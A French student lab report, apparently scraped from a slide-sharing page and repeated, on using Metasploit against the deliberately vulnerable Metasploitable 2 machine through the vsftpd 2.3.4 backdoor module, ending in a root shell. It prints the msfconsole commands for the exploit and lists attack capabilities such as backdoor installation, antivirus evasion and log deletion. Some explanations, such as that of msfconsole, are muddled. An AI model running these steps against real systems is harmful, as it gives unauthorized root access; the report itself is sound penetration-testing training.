1
SECURITE
Département Génie d’Informatique
Faculté des Sciences et Techniques
TANGER
Rapport
Metasploit et Metasploitable 2
Sécurité
Le 10/12/2018
Master Système Informatique et Mobile
Réalisé par : Encadré par :
 EDAIG KHALID. Mr. BOUDHIR Anouar
2
SECURITE
SOMMAIRE
1. INTRODUCTION............................................................................................................................................3
2. C’EST QUOI METASPLOIT........................................................................................................................... 3
3. QU’EST-CE QUE PEUT FAIRE AVEC METASPLOIT................................................................................3
4. C’EST QUOI MATASPLOITABLE................................................................................................................3
5. INSTALLATION DE METASPLOIT ET METASPLOITABLE2................................................................ 4
5.1. Metasploit ..................................................................................................................................................................... 4
6. METASPLOITABLE 2 ...................................................................................................................................6
7. METASPLOITABLE 2 – VSFTPD ................................................................................................................7
7.1. Exploiter VSFTPD v2.3.4 avec Metasploit....................................................................................................................... 7
8. CONCLUSION .................................................................................................................................................9
3
SECURITE
1. Introduction
Dans ce TP , nous allons exploiter VSFTPD v2.3.4 manuellement et avec Metasploit. Cet exploit VSFTPD
particulier est assez facile à exploiter et constitue un excellent premier départ sur la boîte Metasploitable 2.
2. C’est quoi Metasploit
Metsploit est un outil pour le développement et l’exécution d’exploits contre une machine distante, il permet
de réaliser des audits en sécurité, de tester et développer ses propres exploits. Créé à l’origine en langage de
programmation Perl, Metasploit Framework a été complètement réécrit en langage Ruby.
Il est utilisé souvent par les administrateurs systèmes pour tester les vulnérabilités des systèmes
informatiques afin de les protéger, ou par les hackers à des fins de piratage.
3. Qu’est-ce que peut faire avec Metasploit
Le Framework permet de faire énormément de chose comme :
 Le scan et collecte l’ensemble d’informations sur une machine
 Repérage et l’exploitation des vulnérabilités
 Escalade de privilèges et vol de données
 Installation d’une porte dérobée
 Fuzzing
 Echapper à l’antivirus
 Suppression des logs et des traces
4. C’est quoi Matasploitable
Metasploitable2 (Linux) Metasploitable est une machine virtuelle Linux intentionnellement vulnérable. Cette
machine virtuelle peut être utilisée pour dispenser une formation à la sécurité, tester des outils de sécurité et
appliquer des techniques de test de pénétration courantes.
4
SECURITE
5. Installation de Metasploit et Metasploitable2
5.1. Metasploit
Metasploit est pré-installé dans Kali linux . Il existe en version payante et en version gratuite.
Bien sûr, Kali est fourni avec la version gratuite.
Figure 1 : les machines virtuelle kali linux et Metasploitable2
Avant de commencer avec Metasploit, vous devez connaître quelques termes, comme exploit,
payload…etc
Qu’est-ce qu’un exploit avec Metasploit
C’est des scripts ruby qui nous permettent d’exploiter une vulnérabilité sur une machine distante. On
peut dire que l’exploit nous donne la possibilité de se connecter à une machine vulnérable
Qu’est ce qu’un Payload
C’est le code exécuté après s’être introduit dans la machine cible, il nous permet de contrôler la machine
d’une victime. Comme par exemple : l’ouverture d’un port sur la machine relié à un shell ou encore
l’ouverture d’une session VNC.
Qu’est ce qu’un msfconsole
Selon offensive-security, msfencode est un autre excellent petit outil dans l’arsenal du framework lorsqu’il s’agit
d’exploiter le développement. La plupart du temps, on ne peut pas simplement utiliser le shellcode généré directement
sur msfpayload. Il doit être encodé en fonction de la cible afin de fonctionner correctement. Cela peut signifier
transformer votre shellcode en pur alphanumérique, éliminer les mauvais caractères ou l’encoder pour une cible 64 bits.
Vocabulaire Réseau important
LHOST : lhost est l’adresse IP de l’attaquant
LPORT : C’est le port que vous souhaitez utiliser
RHOST : Ceci est l’adresse IP de la machine victime
RPORT : Le numéro de port de la victime.
5
SECURITE
On va commencer avec Metasploit
 Démarrez le service Kali PostgreSQL.
 Démarrez le service Kali Metasploit.
 Démarrer la msfconsole.
6
SECURITE
 Afficher le status de db
 afficher les différents types d’exploits
6. Metasploitable 2
 Connexion à la machine vm Matasloitable 2
 Récupérer l'adresse IP de la machine virtuelle Metasploitable 2
7
SECURITE
7. Metasploitable 2 – VSFTPD
7.1. Exploiter VSFTPD v2.3.4 avec Metasploit
Tout d’abord, on va installer la dernière version de Kali linux, il vous faut configurer votre base de
donnée pour Metasploit. Heureusement pour nous,cela se fait de plus en plus facilement.
 service postgresql start
 msfdb init
 Msfconsole
Afficher le status de connection à la DB
msf > db_statut
Bien connecté.
Le Framework Metasploit contient un exploit spécifique pour exploiter la vulnérabilité de l’application
VSFTPD de v2.3.4. on utilise Metasploit pour exploiter VSFTPD v2.3.4.
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf > show options : pour afficher les différentes options
8
SECURITE
Maintenant on va préciser l’IP de notre hôte-cible par la commande suivante.
msf> set RHOST [IP CIBLE]
Après on va exécuter par la commande run
msf> run
Maintenant on a une session ouvert dans la machine Matasploitable 2. On va travailler sur cette dernière.
-ls /etc pour afficher le contenu du dossier etc.
-on va créer un dossier ‘khalid’
9
SECURITE
8. Conclusion
J’ai exploité une vulnérabilité de l’application VSFTPD v2.3.4 avec Metasploit. Le service
VSFTPD v2.3.4 est en cours d’exécution en tant que root , ce qui nous a donné un ‘shell-root’ sur le
terminal. Sachez maintenant que ce tp est à titre d’exemple car il sera très peu probable que vous
rencontrez cette vulnérabilité dans une situation actuelle car cette version de VSFTPD est vieille et que
la version vulnérable était uniquement disponible qu’un seul jour pour cette démonstration.

Metasploit et Metasploitable2 : exploiter VSFTPD v2.3.4

  • 1.
    1 SECURITE Département Génie d’Informatique Facultédes Sciences et Techniques TANGER Rapport Metasploit et Metasploitable 2 Sécurité Le 10/12/2018 Master Système Informatique et Mobile Réalisé par : Encadré par :  EDAIG KHALID. Mr. BOUDHIR Anouar
  • 2.
    2 SECURITE SOMMAIRE 1. INTRODUCTION............................................................................................................................................3 2. C’ESTQUOI METASPLOIT........................................................................................................................... 3 3. QU’EST-CE QUE PEUT FAIRE AVEC METASPLOIT................................................................................3 4. C’EST QUOI MATASPLOITABLE................................................................................................................3 5. INSTALLATION DE METASPLOIT ET METASPLOITABLE2................................................................ 4 5.1. Metasploit ..................................................................................................................................................................... 4 6. METASPLOITABLE 2 ...................................................................................................................................6 7. METASPLOITABLE 2 – VSFTPD ................................................................................................................7 7.1. Exploiter VSFTPD v2.3.4 avec Metasploit....................................................................................................................... 7 8. CONCLUSION .................................................................................................................................................9
  • 3.
    3 SECURITE 1. Introduction Dans ceTP , nous allons exploiter VSFTPD v2.3.4 manuellement et avec Metasploit. Cet exploit VSFTPD particulier est assez facile à exploiter et constitue un excellent premier départ sur la boîte Metasploitable 2. 2. C’est quoi Metasploit Metsploit est un outil pour le développement et l’exécution d’exploits contre une machine distante, il permet de réaliser des audits en sécurité, de tester et développer ses propres exploits. Créé à l’origine en langage de programmation Perl, Metasploit Framework a été complètement réécrit en langage Ruby. Il est utilisé souvent par les administrateurs systèmes pour tester les vulnérabilités des systèmes informatiques afin de les protéger, ou par les hackers à des fins de piratage. 3. Qu’est-ce que peut faire avec Metasploit Le Framework permet de faire énormément de chose comme :  Le scan et collecte l’ensemble d’informations sur une machine  Repérage et l’exploitation des vulnérabilités  Escalade de privilèges et vol de données  Installation d’une porte dérobée  Fuzzing  Echapper à l’antivirus  Suppression des logs et des traces 4. C’est quoi Matasploitable Metasploitable2 (Linux) Metasploitable est une machine virtuelle Linux intentionnellement vulnérable. Cette machine virtuelle peut être utilisée pour dispenser une formation à la sécurité, tester des outils de sécurité et appliquer des techniques de test de pénétration courantes.
  • 4.
    4 SECURITE 5. Installation deMetasploit et Metasploitable2 5.1. Metasploit Metasploit est pré-installé dans Kali linux . Il existe en version payante et en version gratuite. Bien sûr, Kali est fourni avec la version gratuite. Figure 1 : les machines virtuelle kali linux et Metasploitable2 Avant de commencer avec Metasploit, vous devez connaître quelques termes, comme exploit, payload…etc Qu’est-ce qu’un exploit avec Metasploit C’est des scripts ruby qui nous permettent d’exploiter une vulnérabilité sur une machine distante. On peut dire que l’exploit nous donne la possibilité de se connecter à une machine vulnérable Qu’est ce qu’un Payload C’est le code exécuté après s’être introduit dans la machine cible, il nous permet de contrôler la machine d’une victime. Comme par exemple : l’ouverture d’un port sur la machine relié à un shell ou encore l’ouverture d’une session VNC. Qu’est ce qu’un msfconsole Selon offensive-security, msfencode est un autre excellent petit outil dans l’arsenal du framework lorsqu’il s’agit d’exploiter le développement. La plupart du temps, on ne peut pas simplement utiliser le shellcode généré directement sur msfpayload. Il doit être encodé en fonction de la cible afin de fonctionner correctement. Cela peut signifier transformer votre shellcode en pur alphanumérique, éliminer les mauvais caractères ou l’encoder pour une cible 64 bits. Vocabulaire Réseau important LHOST : lhost est l’adresse IP de l’attaquant LPORT : C’est le port que vous souhaitez utiliser RHOST : Ceci est l’adresse IP de la machine victime RPORT : Le numéro de port de la victime.
  • 5.
    5 SECURITE On va commenceravec Metasploit  Démarrez le service Kali PostgreSQL.  Démarrez le service Kali Metasploit.  Démarrer la msfconsole.
  • 6.
    6 SECURITE  Afficher lestatus de db  afficher les différents types d’exploits 6. Metasploitable 2  Connexion à la machine vm Matasloitable 2  Récupérer l'adresse IP de la machine virtuelle Metasploitable 2
  • 7.
    7 SECURITE 7. Metasploitable 2– VSFTPD 7.1. Exploiter VSFTPD v2.3.4 avec Metasploit Tout d’abord, on va installer la dernière version de Kali linux, il vous faut configurer votre base de donnée pour Metasploit. Heureusement pour nous,cela se fait de plus en plus facilement.  service postgresql start  msfdb init  Msfconsole Afficher le status de connection à la DB msf > db_statut Bien connecté. Le Framework Metasploit contient un exploit spécifique pour exploiter la vulnérabilité de l’application VSFTPD de v2.3.4. on utilise Metasploit pour exploiter VSFTPD v2.3.4. msf > use exploit/unix/ftp/vsftpd_234_backdoor msf > show options : pour afficher les différentes options
  • 8.
    8 SECURITE Maintenant on vapréciser l’IP de notre hôte-cible par la commande suivante. msf> set RHOST [IP CIBLE] Après on va exécuter par la commande run msf> run Maintenant on a une session ouvert dans la machine Matasploitable 2. On va travailler sur cette dernière. -ls /etc pour afficher le contenu du dossier etc. -on va créer un dossier ‘khalid’
  • 9.
    9 SECURITE 8. Conclusion J’ai exploitéune vulnérabilité de l’application VSFTPD v2.3.4 avec Metasploit. Le service VSFTPD v2.3.4 est en cours d’exécution en tant que root , ce qui nous a donné un ‘shell-root’ sur le terminal. Sachez maintenant que ce tp est à titre d’exemple car il sera très peu probable que vous rencontrez cette vulnérabilité dans une situation actuelle car cette version de VSFTPD est vieille et que la version vulnérable était uniquement disponible qu’un seul jour pour cette démonstration.